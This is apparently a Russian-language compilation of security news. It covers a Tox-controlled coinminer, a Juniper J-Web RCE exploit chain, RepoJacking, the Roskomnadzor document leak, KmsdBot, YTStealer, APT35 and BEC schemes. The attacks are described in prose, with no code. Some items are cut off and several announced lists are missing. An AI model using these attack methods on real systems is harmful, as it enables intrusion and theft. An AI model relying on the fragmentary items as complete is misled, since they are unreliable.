Файл предназначен для записи shell-скриптов в каталог "/var/tmp/" с их последующим запуском, что позволяет ему выполнять команды, уничтожающие процессы, которые связаны с криптомайнером;
Кроме того, файл выполняет процедуру, позволяющую использовать ряд определенных команд (например, nproc, whoami, machine-id и т.д.). Результаты выполнения этих команд отправляются злоумышленникам по UDP.
Еще у ELF-файла есть возможность получать различные команды через Tox, обновляющие или выполняющие shell-скрипт в индивидуальном порядке. Команда "exit" обрывает соединение с Tox.
И пускай обнаруженный файл не делает ничего явно вредоносного, эксперты Uptycs считают, что он может быть частью криптомайнинговой кампании.
source: uptycs.com/blog/is-tox-the-new-cc-method-for-coinminers
Правительство РФ в целом одобрило проект закона, который предусматривает обязательное уведомление пользователей об очередном платеже за цифровые подписки. Однако кабмин потребовал доработать некоторые пункты инициативы, которые противоречат действующему законодательству или содержат неопределенные понятия.
Законопроект был внесен в Госдуму депутатами разных фракций, в том числе Петром Толстоем (“Единая Россия”), Леонидом Слуцким (ЛДПР) и Владиславом Даванковым (“Новые люди”). Авторы инициативы хотят защитить права потребителей, которые сталкиваются с ситуацией, когда сервисы не предупреждают их о продлении подписки и списывают деньги без согласия.
По предложенным поправкам, поставщики услуг должны за сутки до очередного платежа оповещать клиентов о предстоящем списании. Если деньги списываются без уведомления, сервис обязан их вернуть. Также сервис должен оказывать услугу до конца предоплаченного периода, если пользователь отказался от дальнейшего продления подписки. Кроме того, запрещается списывать деньги с ранее привязанной к интернет-магазину банковской карты клиента, если он удалил ее с площадки.
Предполагается, что новые правила вступят в силу с 1 марта 2024 года. Это необходимо для адаптации сервисов к новым требованиям. Пока законопроект не предусматривает административной ответственности за нарушение норм, но она может быть введена позже, по итогам мониторинга.
В правительстве РФ отметили, что концепция законопроекта в целом заслуживает внимания, но нуждается в доработке. В частности, необходимо скорректировать отдельные формулировки для исключения правовой неопределенности и оценочных понятий, таких как «регулярное получение», «регулярный доступ», а также с учетом того, что периодические платежи не являются формой безналичных расчетов. Планируется также доработать пункт, связанный с моментом прекращения абонентского договора. В правительстве пояснили, что «требует дополнительной проработки состав правоотношений, в которых необходимо применять предусмотренную законопроектом процедуру, и содержание такой процедуры».
В кабмине подчеркнули, что дополнительное регулирование в данной сфере не должно приводить к необоснованному удорожанию стоимости подписок, так как это негативно скажется на интересах потребителей. В отзыве правительства сказано: «При доработке законопроекта необходимо принять во внимание, что дополнительное регулирование в данной сфере не должно приводить к необоснованному удорожанию стоимости подписок, так как это негативно скажется на интересах потребителей, которые получают доступ к разнообразным и качественным услугам по доступным ценам».
В правительстве также указали, что сроки вступления нововведений в силу нужно привести в соответствие с положениями федерального закона “Об обязательных требованиях в РФ”. Согласно ему, обязательные требования должны вступать в силу либо с 1 марта, либо с 1 сентября соответствующего года, но не ранее чем через 90 дней после официального опубликования документа, если иное не установлено федеральным законом, президентским указом или международным договором.
Проблема с платными подписками актуальна для многих россиян, которые пользуются различными онлайн-сервисами. По статистическим данным, около 18% пользователей имеют активные подписки, которыми не пользуются. Кроме того, существуют мошеннические схемы, которые позволяют красть деньги с банковских карт через фишинговые сайты с подписками на покупку билетов на концерты и спектакли, или через fleeceware-приложения, которые предлагают бесплатный пробный период, а потом списывают необоснованно дорогую подписку.
Новое исследование, проведенное специалистами VulnCheck, показало, что около 12 000 подключенных к интернету межсетевых экранов Juniper SRX и коммутаторов EX все еще уязвимы перед недавно обнаруженной RCE-уязвимостью.
В августе текущего года компания Juniper [выявила ](https://supportportal.juniper.net/s/article/2023-08-Out-of-Cycle-Security- Bulletin-Junos-OS-SRX-Series-and-EX-Series-Multiple-vulnerabilities-in-J-Web- can-be-combined-to-allow-a-preAuth-Remote-Code- Execution?language=en_US&ref=labs.watchtowr.com)многочисленные уязвимости, связанные с манипулированием переменными среды PHP в интерфейсе J-Web (CVE-2023-36844/CVE-2023-36845), а также отсутствием аутентификации для критически важных функций (CVE-2023-36846/CVE-2023-36847).
Сами по себе эти проблемы оценивались лишь в 5,3 балла по шкале CVSS и, казалось бы, не представляли серьезной угрозы. Но в совокупности эти уязвимости стали критическим багом, который приводит к удаленному выполнению кода без аутентификации и уже оценивается в 9,8 балла из 10 возможных по шкале CVSS.
Так, в [техническом отчете ](https://labs.watchtowr.com/cve-2023-36844-and- friends-rce-in-juniper-firewalls/)компании watchTowr Labs был представлен PoC- эксплоит, который объединил CVE-2023-36845 и CVE-2023-36846, позволяя удаленно выполнять код, посредством загрузки двух файлов на уязвимое устройство.
Теперь же свой отчет об этих проблемах представили исследователи из VulnCheck, которые опубликовали еще один PoC-эксплоит. Он задействует только уязвимость CVE-2023-36845 и уже не требует загрузки файлов, по-прежнему позволяя добиться удаленного выполнения произвольного кода.
К своему отчету исследователи приложили ссылку на бесплатный сканер, который помогает обнаруживать в сети уязвимые устройства. К сожалению, исследование показало, что таковых в интернете все еще начитывается около 12 000.
«В этой публикации мы продемонстрировали, как CVE-2023-36845, уязвимость, отмеченная Juniper как проблема средней серьезности, может использоваться для удаленного выполнения произвольного кода без аутентификации, — пишут эксперты. — Мы превратили многоэтапный (но очень хороший) эксплоит [watchTowr] в эксплоит, который можно реализовать с помощью одной команды curl. И, похоже, он затрагивает огромное количество (старых) систем».
Click to expand...
Для изучения уязвимостей аналитики VulnCheck приобрели старый межсетевой экран Juniper SRX210, но обнаружили, что на устройстве отсутствует функция do_fileUpload(), необходимая для загрузки файлов. Это не позволяло реализовать цепочку эксплоитов, созданную watchTowr и вынудило экспертов поискать другой способ удаленного выполнения кода. Так выяснилось, что необходимость загрузки двух файлов на целевой девайс можно обойти, и другие уязвимости для удаленного выполнения кода вообще не требуются.
[](https://xakep.ru/wp- content/uploads/2023/09/436794/PoC.jpg)
Специалисты предупреждают, что уязвимость CVE-2023-36845, исходно получившая всего 5,4 балла по шкале CVSS, должна быть изучена повторно и переоценена, так как явно должна иметь статус критической.
Известно, что перед проблемой CVE-2023-36845 уязвимы следующие версии Junos OS в линейках оборудования EX и SRX:
Производитель выпустил патчи еще 17 августа 2023 года, однако низкий уровень серьезности проблемы, похоже, усыпил бдительность пользователей, и многие предпочли отложить установку исправлений.
Между тем, проведенное VulnCheck сканирование показало, что в интернете можно обнаружить 14 951 веб-интерфейсов Juniper. Изучив 3000 случайных устройств из этой подборки, исследователи обнаружили, что 79% из них уязвимы перед свежим RCE-багом. Если экстраполировать это на все обнаруженные устройства, получится, что в сети доступны 11 800 уязвимых Juniper.
[](https://xakep.ru/wp- content/uploads/2023/09/436794/shodan-scan.jpg)
Хуже того, аналитики компаний Shadowserver и GreyNoise уже предупреждают о том, что злоумышленники тоже ищут в сети эндпоинты с Junos OS на борту и явно изучают возможность использования CVE-2023-36845 в атаках.
Группа безопасности компании Nautilus [проанализировала](https://blog.aquasec.com/github-dataset-research-reveals- millions-potentially-vulnerable-to-repojacking) выборку из 1,25 млн репозиториев GitHub и обнаружила, что около 2,95% из них уязвимы для атак RepoJacking. Они позволяют злоумышленникам развернуть атаки цепочки поставок, затрагивающие большое количество пользователей.
Учитывая процент уязвимых, проблема охватывает примерно 9 млн из 300 млн репозиториев GitHub.
RepoJacking — это атака, при которой злоумышленник регистрирует имя
пользователя и создаёт репозиторий, который использовался организацией в
прошлом, но с тех пор изменил своё название. Это приводит к тому, что любой
проект, который полагается на зависимости атакованного проекта, извлекает
потенциально вредоносный код из репозитория.
GitHub уже реализует некоторые средства защиты от атак RepoJacking. Однако
эксперты сообщают, что эти решения до сих пор легко обойти.
Так, GitHub защищает только очень популярные проекты, но они могут использовать зависимости от менее популярных и уязвимых репозиториев. Специальные меры защиты также не распространяются на проекты, ставшие популярными после их переименования или перехода права собственности.
Группа просканировала известные организации на наличие уязвимых репозиториев и обнаружила случаи эксплуатации уязвимостей в проектах, управляемых Google и Lyft.
В случае с Google это был файл readme, содержащий инструкции по созданию
проекта Mathsteps. Он указывал на репозиторий GitHub, принадлежащий Socratic.
Это купленная Google компания, которой больше не существует. Поскольку
злоумышленник способен клонировать этот репозиторий, чтобы нарушить
перенаправление, пользователи, следуя инструкциям readme, могут загрузить
вредоносный код. Инструкции файла включали команду «npm install» для
зависимости, что позволяет злоумышленникам добиться выполнения произвольного
кода на устройствах.
В случае с Lyft эксперты обнаружили скрипт установки, который извлекает ZIP-
архив из другого репозитория, уязвимого для RepoJacking. Злоумышленник,
регистрирующий новое имя пользователя и репозиторий с именами «YesGraph» и
«Dominus», может внедрить свой код в выполнение скрипта Lyft «install.sh».
Владельцам проектов рекомендуется минимизировать ресурсы, извлекаемые из
внешних репозиториев. Также им следует задуматься о том, чтобы сохранить
контроль над репозиториями старых или приобретённых брендов.
С мая GitHub начал автоматически
блокировать утечку конфиденциальной
информации, такой как ключи API и токены доступа для всех общедоступных
репозиториев кода. Эта функция заблаговременно предотвращает утечки путём
сканирования секретов до того, как будут приняты операции «git push
», и
работает с 69 типами токенов (ключи API, закрытые ключи, секретные ключи,
токены аутентификации, токены доступа, сертификаты управления, учётные данные
и т. д.).
Сразу несколько независимых СМИ вечером в среду выпустили расследования, посвященные крупнейшей утечке документов Роскомнадзора - ведомства, занимающегося цензурой российских СМИ и интернет-пространства. Полученные данные проливают свет на то, как именно Роскомнадзор борется с неугодной информацией, цензурирует информацию о войне и Владимире Путине и следит за россиянами.
В ноябре 2022 года белорусская группа "Киберпартизаны" объявила о взломе ФГУП
ГРЧЦ - Главного радиочастотного центра Роскомнадзора. Хакеры заявили, что им
удалось внедриться во внутреннюю сеть ведомства и выкачать документы и
переписку сотрудников - в общей сложности объем данных превысил 2 терабайта.
Судя по тому, что рассказывают хакеры, их присутствие в системах ГРЧЦ
оставалось незамеченным в течение нескольких месяцев.
В ГРЧЦ официально признали факт
взлома, но настаивали, что "ситуация была управляемой" и хакерам не удалось
получить доступ к "закрытой информации и критически важной инфраструктуре".
Правда, как следует из расследования проекта "Система" (совместный проект
"Свободы" и "Настоящего времени", внесенных в реестр "иноагентов" в России),
внутри ГРЧЦ утечку восприняли как "моральную трагедию" - во внутренних чатах
сотрудники обсуждали произошедшее как катастрофу.
"Киберпартизаны" сообщили, что данные утечки доказывают "масштабную слежку в
сети и попытки установить тотальный контроль за всеми, кто за последние 20 лет
высказывался против путинского режима". Архив данных они передали российским и
западным журналистам. К вечеру 8 февраля расследования на его основе
опубликовали немецкая Süddeutsche Zeitung,
"Медиазона" (внесена в реестр
"иноагентов" в России) , "[Система](https://www.currenttime.tv/a/russia-leak-
internet-censorship/32262160.html)",
"Агентство", центр
"Досье", а также проект "Важные истории"
(признан в России "нежелательной организацией").
Утечка свидетельствует, что одна из главных целей ГРЧЦ - зачистка любой
неугодной информации о Владимире Путине. Сотрудники ведомства ежедневно
мониторят СМИ и соцсети на предмет любой информации, которая, по их мнению,
может создать негативный образ российского президента.
Как пишут "Важные истории", по итогам любых мероприятий с участием Путина
сотрудники ГРЧЦ составляют отчеты, в которых собирают всю негативную реакцию
на появление президента. Вот, например, как выглядит фрагмент такой
аналитической записки, составленной по итогам недавнего визита Путина в
Калининград:
"Другие авторы иронизировали над озвученной В. В. Путиным фразой о том, что
"трудолюбие - это вообще отдельный талант, это не просто, извините, резиновая
попа". Подчеркивалось, что подобное высказывание, как и остальные выступления
главы государства, "уже давно не вызывают никаких эмоций, кроме испанского
стыда".
Для составления отчетов сотрудникам ГРЧЦ предписано выделять "точки
информационной напряженности". В их обязанности входит не только мониторинг
реакции на работу Путина, но и прогнозы о том, какие события могут
спровоцировать критику в будущем.
Активно ГРЧЦ следит и за сообщениями о здоровье Путина. "Агентство" обнаружило
во внутренних документах ведомства несколько десятков файлов с одинаковым
заголовком "Критическое состояние здоровья Президента РФ В.В. Путина" - они
создавались с апреля по октябрь 2022 года.
Каждый такой мониторинг выглядит как таблица, в которую занесены посты о
здоровье Путина - преимущественно из российских соцсетей и Telegram. В отчетах
попадаются отобранные комментарии о том, что российский президент якобы
страдает от "рака" или "шизофрении" - обычно поводом для них становятся
соответствующие публикации или заявления в СМИ.
А "Важные истории" заметили, что задача по "мониторингу инфоповодов об
ухудшении состояния здоровья президента" даже поручалась в качестве тестового
задания кандидатам на должности в департамент мониторинга.
За публикациями о Путине ГРЧЦ следит с помощью системы мониторинга СМИ и
соцсетей Brand Analytics, а также вручную. Журналисты обнаружили, что
информацию о президенте сотрудники Роскомнадзора искали по ключевым словам - в
том числе "плешивый карлик", "Пыня" и "пуйло".
"Досье" пишет, что один из документов утечки называется "Методика оскорбления
президента". Из него следует, что поисками негатива о Путине ведомство
занимается, ссылаясь на федеральный закон "Об информации", который
предписывает блокировать контент, оскорбляющий органы госвласти. В методичке
приведены примеры, на основе которых мониторщики должны решать, какие данные
считать оскорбительными.
Роскомнадзор в дальнейшем планирует оптимизировать поиск негатива о Путине.
Еще в августе СМИ писали, что ГРЧЦ выделил московской IT-компании "Эксикьюшн
Эр Ди Си" 57,7 млн рублей на разработку системы "Окулус", которая на основе
нейросетей будет анализировать фото, видео и тексты на сайтах, в соцсетях и
мессенджерах на предмет запрещенной информации.
Как пишет "Система", в задачи "Окулуса" также будет входить поиск
оскорбительных картинок о Путине на основе "классификатора графических
сущностей". Классификатор предлагает два типа изображений: "оскорбительные
изображения президента" (например, в образе "моли" и "краба") и "сравнение
президента с отрицательными персонажами" (например, с Адольфом Гитлером,
вампирами или педофилами);
После начала войны Роскомнадзор интересовался не только негативом в адрес
Путина, но и негативным контентом по отношению к властям в целом, обращает
внимание "Досье".
Роскомнадзор и ГРЧЦ с начала войны стали главным инструментом властей для борьбы с неугодной информацией о российском вторжении в Украину. Как следует из внутренних документов Роскомнадзора, за первые 9,5 месяцев войны в Украине российские власти удалили 150 тысяч публикаций в соцсетях, пишет "Агентство".
Сведения о негативных публикациях о войне сотрудники ГРЧЦ обсуждают в уже
упоминавшемся мессенджере КОВ.
"Система" в своем расследование пишет и о том, что мощности Роскомнадзора
подключены и к удалению "неправильной" информации о войне из российских
поисковиков. Например, у ведомства есть миссия под названием "спецзадача
Яндекс У" - как следует из документов, она заключается в мониторинге ссылок
на антивоенные материалы в российском поисковике.
Из переписки сотрудников следует, что примерами запросов, по которым следует
вручную корректировать поисковую выдачу, в ведомстве считают такие: "Россия
бомбит жилые дома", "Россия расстреливает мирных жителей", "зверства
российских военных в Буче", "преступления российских военных", "российские
срочники на Украине", "огромные потери российских войск на Украине".
Анализируют в ГРЧЦ и соцсети - сотрудники анализируют не заблокированные в
России соцсети ежедневно. На основе этого мониторинга формируются таблицы для
выявления "фейков". Сами "фейки" распределяют по таким категориям, как
"убийство мирных жителей", "обстрелы мирного населения", "обстрелы городов",
"потери личного состава и техники", "военнопленные", "мародерство",
"мобилизация", "дестабилизация внутри России".
ГРЧЦ также мониторит публикации на оккупированных Россией украинских
территориях. Сейчас там ограничен доступ к 262 сайтам украинских теле- и
радиоканалов, а также страницам, позволяющим просматривать их в онлайн-режиме.
В России ограничен доступ к 630 украинским сайтам, следует из внутренней
статистики Роскомнадзора.
Вот уже несколько лет российские власти активно признают независимых
журналистов и СМИ иностранными агентами, а с началом войны это стало
происходить еще чаще. Сейчас этот статус имеют сотни людей. Но, судя по утечке
Роскомнадзора, останавливаться на достигнутом власти не планируют.
Как пишут "Важные истории", из слива следует, что ведомство подготовило
справки на более чем 800 человек для признания их иноагентами. Издание
опубликовало их список - среди них только 139 человек на данный момент попали
в реестр. В справки входят данные, которые ГРЧЦ собирал с 2020 по 2022 год. По
мнению "Важных историй", список потенциальных "целей" может быть еще шире,
потому что в утечку попали не все документы.
Судя по данным утечки, Роскомнадзор следит и за так называемыми лидерами
общественного мнения. В оказавшемся у журналистов списке таких людей, который
якобы собирало ведомство, - 472 человека с описанием рода деятельности и
ссылками на все найденные аккаунты в соцсетях. Согласно этому списку, ГРЧЦ
следит за сетями ряда актеров и актрис, блогеров, стендап-комиков,
журналистов, режиссеров и музыкантов разной направленности - от Бориса
Гребенщикова до группы "Кис-кис".
За СМИ после начала войны Роскомнадзор стал следить еще пристальнее. Как пишет
"Досье", 28 февраля 2022 года, через четыре дня после начала вторжения в
Украину, перед сотрудниками Роскомнадзора поставили задачу мониторить сайты
"на предмет контента, который противоречит официальной позиции Минобороны".
"Смотрим сайты, ищем контент, в котором говорится, что ВС РФ бомбит (убивает,
ранит, стреляет…) мирное население, городскую инфраструктуру и т.п. Находим
факт такой публикации - в столбце "Е" отмечаем сайт словом "вносим", -
говорится в сообщении из переписки сотрудников. Примечательно, что закон о
"фейках", допускающий внесудебные блокировки, приняли только через четыре дня
после его отправки.
К волне блокировок СМИ за отказ соблюдать требования в ГРЧЦ тоже начали
готовиться заранее. Например, основания для блокировки Deutsche Welle и
Русской службы Би-би-си ведомство начало искать уже 25 февраля (а в ночь на 4
марта блокировки были осуществлены).
Некоторые СМИ Роскомнадзор для регулярного мониторинга "протестных настроений"
обозначает как "антироссийские" - в качестве таких там упоминаются Русская
служба Би-би-си, "Медуза" (внесена в реестр "иноагентов", а также объявлена
нежелательной организацией), "Радио Свобода", The Insider (признано
нежелательной организацией в России и внесено в реестр "иноагентов"), канал
"Редакция".
Русская служба Би-би-си обратилась в Роскомнадзор с просьбой прокомментировать
утверждения из описанных расследований и ожидает ответа.
При просмотре логов на одной из ловушек эксперты Akamai Technologies
обнаружили команды на загрузку исполняемого файла, именуемого kmsd. Как
оказалось, это не документированный ранее бот, способный генерировать DDoS-
поток, добывать криптовалюту и самостоятельно распространяться через брутфорс
SSH.
Анализ показал, что новоявленный зловред написан на Go и поддерживает разные
архитектуры, в том числе x86, x86-64, ARM64 и MIPS64. Список целей DDoS-атак
KmsdBot, как его нарекли в Akamai, включает представителей игровой индустрии,
ИТ-компании, производителей автомобилей класса люкс.
Вредонос примечателен тем, что не старается закрепиться в системе — видимо,
эта уловка призвана обеспечить ему большую скрытность. С той же целью бот
часто получает обновления, меняя набор функций и IP-адрес центра управления, а
также держит под контролем майнинг — останавливает процесс, а потом вновь
запускает.
Механизмы самораспространения позволяют зловреду выполнять сканирование портов
SSH и загружать с командного сервера список юзернеймов и паролей для взлома
перебором. Обмен с C2 осуществляется с использованием TCP-пакетов.
Первая DDoS-атака KmsdBot, зарегистрированная экспертами, была предпринята
против одного из клиентов Akamai — создателя FiveM, многопользовательской
модификации для Grand Theft Auto V. Злоумышленники открыли UDP-сокет и
передавали мусорные пакеты, используя сеансовый токен FiveM; данная атака была
нацелена на истощение ресурсов на сервере.
Из других техник DDoS выявлены SYN-ACK flood и HTTP flood (POST и GET).
Случаев использования криптомайнера (XMRig) пока не зафиксировано.
Кросс-платформенные DDoS-боты — уже не редкость; тенденция объединять их с
майнерами для большей отдачи тоже не нова. Иногда злоумышленники, используя
вредоносов с богатыми DDoS-возможностями, пытаются монетизировать их иным
способом — например, заставляя вымогать деньги за прекращение атаки.
Видеоблогеры рискуют потерять канал в YouTube
Эксперты компании Intezer обнаружили новое вредоносное ПО YTStealer, которое
крадет токены аутентификации и YouTube каналы. YTStealer имитирует ПО для
редактирования видео (OBS Studio, Adobe Premiere Pro, FL Studio, Ableton Live,
Antares Auto-Tune Pro и Filmora).
Для атаки на создателей игрового контента YTStealer выдает себя за моды для GTA V, читы для Counter-Strike Go и Call of Duty, игры Valorant или хаки для Roblox. YTStealer также распространяется через взломщики и генераторы токенов для Discord Nitro и Spotify Premium.
Перед развертыванием на хосте стилер с помощью open-source инструмента Chacal тщательно проверяет SQL файлы базы данных браузера, чтобы найти токены аутентификации YouTube. Затем ПО проверяет токены, запуская веб-браузер в автономном режиме и добавляя украденный cookie файл в свое хранилище. Если токен действителен, YTStealer также собирает дополнительную информацию:
Поскольку YTStealer полностью автоматизирован, операторы стилера могут оценить результат работы не сразу. По словам Intezer, украденные аккаунты продаются в даркнете, причем цены зависят от размера канала.
Даже если учетные записи авторов YouTube защищены многофакторной аутентификацией , токены аутентификации могут обойти МФА и позволить злоумышленнику получить доступ к аккаунту. Авторам YouTube каналов следует периодически выходить из аккаунта, чтобы сбросить токены аутентификации, которые могли быть украдены ранее.
работу с Киевом
Раскрытый в Бердянске колл-центр мошенников располагал данными не менее 20 миллионов россиян, действовал по согласованию с властями Украины, при этом его деятельность поддерживалась из Нидерландов, Германии, США и Эстонии, заявил журналистам зампред правления Сбербанка Станислав Кузнецов.
Российские военнослужащие в апреле нашли в Бердянске брошенный украинскими мошенниками колл-центр, сообщали ранее СМИ. Сбербанк тогда привлекли в качестве эксперта, чтобы помочь восстановить данные, которые были на поврежденных серверах, рассказал Кузнецов.
"К настоящему времени мы на всей технике, которую нам передали, смогли воссоздать картинку примерно на 10% всех серверов из 111 серверов. Сегодня мы можем сделать первые выводы, что в этом колл-центре работало не менее 300 человек, они располагали базой данных по гражданам России - не менее 20 миллионов человек", - сообщил он в кулуарах конференции "Цифровая индустрия промышленной России".
Отмечается, что персональные данные россиян были получены мошенниками из сервисов логистики и доставки, которые взламывали через интернет-ресурсы. "Важно, что фактически этот колл-центр - мы считаем, что он достаточно крупный
Зампред правления Сбербанка также рассказал, что в колл-центре был обнаружен международный след. "Вся инфраструктура, которая была в этом колл-центре в Бердянске, была развернута в двух странах - Германии и Нидерландах, сервисы учета звонков и безопасная система учета звонков были развернуты в США, IP- телефония была развернута в Эстонии. Фактически деятельность этого колл-центра поддерживалась четырьмя иностранными государствами, помимо Украины", - заключил он.
Комитет Госдумы по информполитике поддержал инициативу РКН и подготовил ряд
поправок в закон «О персональных данных».
Заместитель руководителя Роскомнадзора Милош Вагнер на расширенном заседании
комитета Госдумы по информполитике, посвященном поправкам к закону о
персональных данных, предложил расширить ответственность за кражу и торговлю
ими вплоть до уголовного наказания. Трансляция заседания велась на сайте
Госдумы.
«Предложили бы проработать меры по увеличению ответственности, вплоть до уголовной для тех, кто организует такую незаконную торговлю, незаконный доступ к утекшим персональным данным. Нужно жестко наказывать тех, кто формирует спрос на эти утечки. Только так, на наш взгляд, можно предотвратить этот вал мошенничества с нашими персональными данными», — заявил Вагнер.
Представитель Роскомнадзора также отметил, что сейчас штраф за незаконное распространение персональных данных не превышает 100 тысяч рублей.
Глава комитета Александр Хинштейн поддержал эту идею, отметив, что стоит наказывать и тех, кто покупает персональные данные на черном рынке.
Агентство по кибербезопасности PeckShield выявило в интерфейсе платформы для выпуска и торговли NFT OpenSea критическую уязвимость, позволяющую приобретать токены по сильно заниженным ценам.
Бот оповещений в режиме реального времени PekShieldAlert от агентства по кибербезопасности PeckShield [выявил](https://twitter.com/PeckShieldAlert/status/1485547426467364864?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1485547426467364864%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Fcryptopotato.com%2Fhacker- targets-bored-ape-nft-holders-in-a-reported-opensea-exploit-750k-stolen%2F) критическую уязвимость в интерфейсе OpenSea. В использовании уязвимости уличен пользователь под псевдонимом jpegdegenlove. На текущий момент злоумышленник смог получить 347 ETH на сумму свыше $750 000.
Пользователь Twitter VirtualToast.eth сообщил, что его NFT Bored Ape #8924 был куплен за 6.66 ETH – примерно на 92% меньше текущей минимальной стоимости. Со слов пользователя, ранее он планировал продать Bored Ape #8924 по этой цене, но затем решил отменить торги и отправил NFT на другой кошелек.
Однако, несмотря на то, что NFT был исключен из списка продаж маркетплейса, фактически заявка на продажу отражалась активной по API ОS. Это позволило злоумышленнику выкупить Bored Ape #8924 по старой цене. Пользователь Twitter The Autist Wizard считает, что преступник целенаправленно выбрал объектами атаки именно владельцев NFT Bored Ape.
Это не первая претензия, направленная пользователями в адрес маркетплейса OpenSea. Ранее было выявлено мошенничество с использованием инсайдерской информации, которая позволяла сотруднику OpenSea скупать наиболее перспективные NFT до их публикации в открытом доступе.
Японские власти сообщили, что бывший студент из Китая подозревается в том, что он пытался нелегально приобрести компьютерное обеспечение в области кибербезопасности, которое продается в Японии.
Источники, ведущие расследование, сообщают, что в 2016 году этот человек в возрасте 30 с лишним лет, по подозрениям, пытался купить программное обеспечение, работающее на основе высоких технологий. В Японии приобретать такие программы могут только компании.
По подозрениям, китаец руководствовался инструкциями человека, связанного с Китайской народной освободительной армией и пытался приобрести эту компьютерную программу, используя вымышленное название компании.
Однако попытка провалилась, потому что компания, продающая эти программы, заподозрила неладное и отказалась осуществлять сделку.
Токийская полиция допросила бывшего студента, который добровольно согласился ответить на вопросы, однако позднее выяснилось, что он уехал из Японии. Полиция получила ордер на его арест по подозрению в попытке мошенничества.
Полиция подозревает, что таким образом Китай пытался приобрести информацию о мерах безопасности, которые практикуют японские компании, в попытке найти уязвимые места для кибератак.
Власти планируют попросить Международную организацию уголовной полиции включить этого китайца в международный список находящихся в розыске.
Специалисты Google нейтрализовали ряд вредоносных кампаний, организованных иранской группировкой APT35.
Команда ИБ-специалистов Threat Analysis Group (TAG) компании Google отслеживает более 270 поддерживаемых правительством киберпреступных группировок из более чем 50 стран. С начала 2021 года эксперты отправили клиентам примерно 50 тыс. предупреждений о попытках фишинга или установки вредоносного ПО. По словам техногиганта, количество подобных предупреждений на 33% больше, чем в 2020 году.
Специалисты Google нейтрализовали ряд вредоносных кампаний, организованных иранской группировкой APT35 (также известной как Charming Kitten, Phosphorous, и Newscaster), в том числе кампанию с использованием социальной инженерии, получившую название Operation SpoofedScholars и направленную на аналитические центры и журналистов с целью получить конфиденциальную информацию. Преступники выдавали себя за ученых Школы восточных и африканских исследований Лондонского университета (SOAS).
Прочие атаки включали использование зараженного шпионским ПО VPN-приложения , загруженного в Google Play Store, которое после установки могло использоваться для скачивания конфиденциальной информации, в том числе журналов вызовов, текстовых сообщений, контактов и данных о местоположении с зараженных устройств. Кроме того, APT35 применяет необычную тактику, касающуюся использования Telegram для уведомления о посещении жертвой фишинговых сайтов в режиме реального времени.
Злоумышленники выдавали себя за должностных лиц, отправляя электронные письма на тему конференций Munich Security и Think-20 (T20).
source: blog.google/threat-analysis-group/countering-threats-iran
virustotal.com/gui/file/5d3ff202f20af915863eee45916412a271bae1ea3a0e20988309c16723ce4da5
Материалы относительно трех работников киберполиции, которых СБУ разоблачила на вымогательстве средств у потерпевшего, переданы в суд.
Как сообщили в пресслужбе Управления СБУ в Ивано-Франковской области, в апреле Служба безопасности Украины задержала старшего инспектора и инспектора отдела противодействия киберпреступлениям в служебном помещении Ивано-Франковского отдела Департамента киберполиции сразу после получения ими 150 тысяч гривен взятки. Деньги они вымогали у потерпевшего в уголовном производстве. Позже правоохранители доказали причастность к совершению преступления третьего фигуранта - руководителя Ивано-Франковского отдела Департамента киберполиции.
Напомним, оперативники СБУ установили, что предприниматель из Ивано-Франковска обратился в полицию с заявлением о преступлении. Хакеры перевели с его банковского счета 900 тыс. грн. и пытались снять их наличными в одном из отделений. Однако банковские работники заблокировали эту транзакцию как подозрительную. Для возврата средств бизнесмен обратился в полицию.
Сотрудники СБ Украины задокументировали, что киберполицейские гарантировали мужчине вернуть доступ к его собственным средствам за «вознаграждение» - 150 тысяч гривен. Двух фигурантов задержали на «горячем» в момент получения взятки. Позже были собраны доказательства соучастия руководителя Ивано- Франковского отдела Департамента киберполиции. Он непосредственно организовывал возврат средств и через подчиненных получил взятку от потерпевшего.
Трое киберполицейских обвиняются в получении неправомерной выгоды по предварительному сговору группой лиц (ч. 3 ст. 368 УК Украины). Санкция статьи предусматривает лишение свободы на срок от 5 до 10 лет.
Прекращение противоправной деятельности проводило Управление СБУ в Ивано- Франковской области. Следствие вели следователи территориального управления ГБР в г. Львове. Процессуальное руководство осуществляла Ивано-Франковская областная прокуратура.

Завтра компания Microsoft развернет службу Emergency Mitigation (EM), новую функцию для серверов Exchange, которая автоматически устанавливает временные средства защиты для блокирования продолжающихся атак, пока Microsoft не будет готова выпустить программное исправление.
Функция EM будет доступна всем пользователям Exchange через CUs для серверов Exchange от сентября 2021 года, которые будут выпущены завтра.
Microsoft специально отложила выпуск CUs от 21 сентября на прошлой неделе, чтобы больше поработать над этой функцией.
Служба настолько плохо разработана и настолько небезопасна, что требует постоянного исправления в реальном времени. И все же люди платят за его использование.
Click to expand...
И можно с уверенностью сказать, что этот сервис не будет работать так, как задумано. Это просто очередное дерьмо, чтобы заставить вас думать, что они действительно создают качественные и безопасные вещи. Лиса охраняет курятник, и все это шутка.
Click to expand...
Microsoft связала слишком много проблем в Exchange. Аналогичные возможности можно создать и использовать с помощью более современной архитектуры и дизайна.
Click to expand...
Тоже самое что и KIR. Они просто переименовали его и теперь добавляют поддержку серверов Exchange и называют его "Emergency Mitigation (EM)". [https://techcommunity.microsoft.com...u-keep-windows-devices- protected/ba-p/2176831](https://techcommunity.microsoft.com/t5/windows-it- pro-blog/known-issue-rollback-helping-you-keep-windows-devices- protected/ba-p/2176831)
Click to expand...
На самом деле я думал "это классная функция", пока не прочитал, что они не предлагают CLI для удаления смягчения, и пользователю придется делать это вручную (например, переписывать изменения в конфигурации IIS). Если смягчение сломает установку Exchange, администраторы будут веселиться
Click to expand...

](https://docs.microsoft.com/en-us/exchange/exchange-emergency-mitigation- service?view=exchserver-2019)
Exchange Emergency Mitigation Service (Exchange EM Service)
docs.microsoft.com
На подпольных форумах появились объявления о поиске партнеров по отъему денег у юрлиц посредством компрометации корпоративной почты (BEC). По свидетельству Intel 471, аферисты ищут помощников, свободно владеющих английским языком, для ведения переписки в рамках таких схем развода: отсутствие огрехов в правописании и грамматических ошибок делает подложные письма более убедительными.
Проведение BEC-атаки не требует особых технических навыков. Мошенники, как правило, направляют в адрес жертвы поддельное письмо от имени бухгалтерии, руководства или партнера компании с просьбой перевести значительную сумму на указанный счет. Чтобы обман удался, имитация должна быть предельно правдоподобной — с этой целью злоумышленники прилежно собирают информацию о мишени, используют элементы социальной инженерии, взламывают почтовые ящики и создают фейковые аккаунты и домены.
